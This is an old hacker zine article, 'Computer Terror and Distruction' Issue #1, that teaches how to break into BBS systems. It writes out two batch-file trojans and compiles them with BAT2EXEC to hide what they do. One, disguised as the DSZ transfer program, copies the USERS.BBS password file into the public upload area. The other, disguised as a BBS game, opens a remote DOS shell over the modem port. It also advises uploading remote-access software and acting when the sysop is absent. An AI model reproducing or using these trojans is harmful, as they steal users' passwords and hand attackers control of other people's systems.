Computer Terror and Distruction
Issue #1 - BBS Infiltration
By the Chamelion
This article starts of the first issue of Computer Terror and
Distruction. Each issue will deal with a particular area of
computer distruction, dealing mostly with different ways to fuck
over computers.
After taking a look at some of the better phreak/hack BBS
systems, I haven't been able to find any good material on BBS
distruction. Most of the information I have gathered is rather
simple and outdated, and dealt mostly with hitting Control Break
alot. Well, as most BBS systems are no longer written is basic,
this is a rather stupid thing to try doing. (Although it still
works on some lame BBS games). One of the best methods of
breaking into a BBS is uploading a trojan horse. The easiest
language to create a trojan is in batch language. However, the
sysop can easily view the program before he runs it, and thus the
trojan is discovered. However, using a new program called
BAT2EXEC, you can convert your trojan batch file to a COM file,
which is harder to read.
(Note: If BAT2EXEC.COM isn't in the archive file, it was created by
Pc.Magazine and can be found on many sharewars BBS's)
To compile a batch file edit the batch file with edlin then type
in BAT2EXEC.COM, followed by the batch file. It will convert the
file to COM format. This is nice for speeding up large batch
files, etc. But, there is another important reason which makes
this program useful. Let's say that there is this lamer BBS is
your area, and you want to mess with the BBS. Here, you have two
choices. You can steal the USERS.BBS listing, which includes all
users and their passwords. Or, you can set up his BBS so you can
shell to his DOS to do whatever you want. What you want to do is
setup a Trojan Horse on the system to do whatever you want. The
best way to do this is to give the sysop software that he is
likely to use. Secretly you booby-trap it to do what you want.
Ok, the next section deals with how to steal the USERS.BBS
listing, which includes all user names and passwords. The second
section is all about how to get access to the systems DOS via
modem. I'd read the first section, as it includes lots of
information you need to know.
SECTION #1 - How to get a copy of the user file.
First, get the docs for the type of software the target BBS
operates with, and find out the name of listing. USERS.BBS works
for Remote Access, but Pcboard, etc use different names. Now,
get some utility or game that the BBS sysop is sure to run on his
system. Now, look at the files that are included in the utility
(or game).
For example, DSZ includes-
DSZ.DOC
DSZ.EXE
and a bunch of other shit. So, first rename DSZ.EXE DSZ.DAT.
Then, using EDLIN (For some reason, you need to use EDLIN for it
to work with BAT2EXEC. This is probably because in EDLIN you hit
control C to end the text, and BAT2EXEC looks for this. So, you
can type everything but the last two lines in a text editor, and
finish it off with EDLIN, using CONTROL C to stop entering text.)
Now, make a batch file called DSZ.BAT. It should look something
like this.
@ECHO OFF
IF EXIST C:\RA\USERS.BBS GOTO COPY
REM Checks to see if the USERS.BBS listing is there.
GOTO DSZ
:COPY
IF EXIST D:\FILES\UPLOAD\GAME.ZIP GOTO DSZ
REM Sets it to only copy once.
REM Now we want to copy the USERS.BBS listing to the new file
REN directory, under the name of GAME.ZIP
COPY C:\RA\USERS.BBS D:\FILES\UPLOAD\GAME.ZIP >DMP.DMP
REM DMP.DMP is used to redirect the screen output
REM Now is the tricky part. You need to have FILES.BBS listing
REM add TOOBIN1.ZIP to it's listing of on-line files.
COPY DSZ.DMP + D:\FILES\UPLOAD\FILES.BBS
D:\FILES\UPLOAD\FILES.BAK > DMP.DMP
REM D:\files\upload will change depending on the sub-dir setup.
REM DSZ.DMP, a file you will need to make, is appended to
REM a listing of all available files.
COPY D:\FILES\UPLOAD\FILES.BAK D:\FILES\UPLOAD\FILES.BBS >DMP.DMP
DEL DMP.DMP
:DSZ
REM Now we want to run DSZ like normal.
REN DSZ.DAT DZ.EXE
REM Turn back on monitor
DSZ %1 %2 %3 %4 %5 %6 %7
REN DZ.EXE DSZ.DAT
REM All done!
Now, run BAT2EXEC DSZ.BAT, to create DSZ.COM
Ok, remember how i said you need to add USERS.BBS (which was
renamed game.zip) to the FILES.BBS listing? Ok, now create a
file that is called DSZ.DMP, and that looks like this.
GAME.ZIP Game Disk #1, cracked by INC!
(Description should start on 14th line)
Now I will recap what will happen when you have everything
setup. The sysop sees that someone (You) has uploaded the newest
version of DSZ Z-Modem, so he installs it. The files he places
in his protocol directory are:
DSZ.COM -Your batch file changed into COM.
DSZ.DAT -The real DSZ
DSZ.DOC -Docs to DSZ
DSZ.DMP -Has text that says "game.zip"
Now, he gets his BBS software to run DSZ.COM, which he thinks is
DSZ. Because it's a com file, he can't tell what it does, which
is the whole reason for using BAT2EXEC.COM anyway. There is no
way he can tell what DSZ.COM does. DSZ.COM runs, and copies
USERS.BBS listing to the new files listing under the name
GAME.ZIP. Then, DSZ.DMP is added to the Files.BBS listing, so
when you do a listing of new files, it will be there. Then
DSZ.DAT is renamed to DZ.EXE. DZ.EXE is then run. Then DZ.EXE
is renamed back to DSZ.DAT. Now, all you have to do is download
GAME.ZIP, and you are off!
Of course, it is even easier to delete Users.BBS, but that's not
as much phun.
Section 2-
Ok, now let's say you want to shell to the BBS system's DOS,
instead of copying the user listing. Do this when the sysop is
out of town, etc, so he doesn't show up and see what you are
doing. This time, the example uses Global War, a popular BBS
game.
Rename Gwar.exe GW.DAT
@ECHO OFF
IF %5==JACK GOTO FIRST
IF %5==jack goto first
REM Replace Jack with your first name
GOTO RUN
:first
IF %6==RIPPER GOTO LAST
if %6==ripper GOTO LAST
REM Replace Ripper with your last name
GOTO RUN
:LAST
CTTY COM1
REM Choose the com port that the BBS uses!
c:\command.com
REM Just type "Exit" to end the shell
goto end
:run
ren gw.dat gw.exe
gw.exe %1 %2 %3 %4 %5 %6 %7
ren gw.exe gw.dat
:END
Now, when you give the sysop the file, and he installs it,
whenever you try to run GWAR, you will be placed in a DOS shell!
just remember several things. Don't try to directly import any of
these files. You will need to make modifications, depending on
the BBS type, and several other parameters. For example, Gwar is
not always run from the command line, and may search a file for
the user name. It is important that no one is around when you do
this. It's a good idea to mess around as much as possible before
you upload something.
Also, when you are in that DOS shell, don't run any graphic
applications. The best way to do it is to upload a simple gateway
program like PC Anywhere. Once you are in DOS, go unzip it and
then run it. The best thing to do is be completely origional in
your style of creating trojan horses, always use a bogus name or
alias.
BTW, I can be reached via bitnet at
chamelio@hiway.scol.pa.us
...psuvax1!psuecl!hiway!chamelio
...psuvax1!hogbbs!hiway!chamelio
Or on Lost Dungeon 1 gig! (212)
(I do not accept any responsabilty for what you may do (or have
done to you) with this information. Use at your own risk)
Greets go out to Electric Monk, The Pope, and Zolten Coldia, and Road
Master.
EGBT is comming to a computer near you!
and Road
Master.
EGBT is comming to a computer near you!